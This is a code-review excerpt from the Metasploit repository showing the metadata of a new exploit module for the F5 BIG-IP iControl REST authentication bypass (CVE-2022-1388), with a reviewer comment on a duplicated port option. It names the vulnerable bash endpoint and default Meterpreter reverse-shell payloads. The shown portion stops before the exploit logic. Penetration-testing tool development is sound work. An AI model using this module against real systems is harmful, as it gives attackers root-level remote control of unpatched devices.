modules/exploits/linux/http/f5_icontrol_rce.rb

```diff
@@ -0,0 +1,173 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'F5 BIG-IP iControl RCE via REST Authentication Bypass',
+        'Description' => %q{
+          This module exploits an authentication bypass vulnerability
+          in the F5 BIG-IP iControl REST service to gain access to the
+          admin account, which is capable of executing commands
+          through the /mgmt/tm/util/bash endpoint.
+
+          Successful exploitation results in remote code execution
+          as the root user.
+        },
+        'Author' => [
+          'Heyder Andrade', # Metasploit module
+          'alt3kx <alt3kx[at]protonmail.com>', # PoC
+          'Ron Bowes' # Documentation of exploitation specifics
+        ],
+        'References' => [
+          ['CVE', '2022-1388'],
+          ['URL', 'https://support.f5.com/csp/article/K23605346'],
+          ['URL', 'https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/']
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2022-05-04', # Vendor advisory
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :bourne,
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session
+          'SideEffects' => [
+            IOC_IN_LOGS, # /var/log/restjavad.0.log (rotated)
+            ARTIFACTS_ON_DISK # CmdStager
+          ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
```

Comment:
We added this to `DefaultOptions` already. Sorry.

Reply:
Resolved in https://github.com/rapid7/metasploit-framework/pull/16549/commits/61f5303fc43631c834dcbe81cdc8b2ddf700a6c8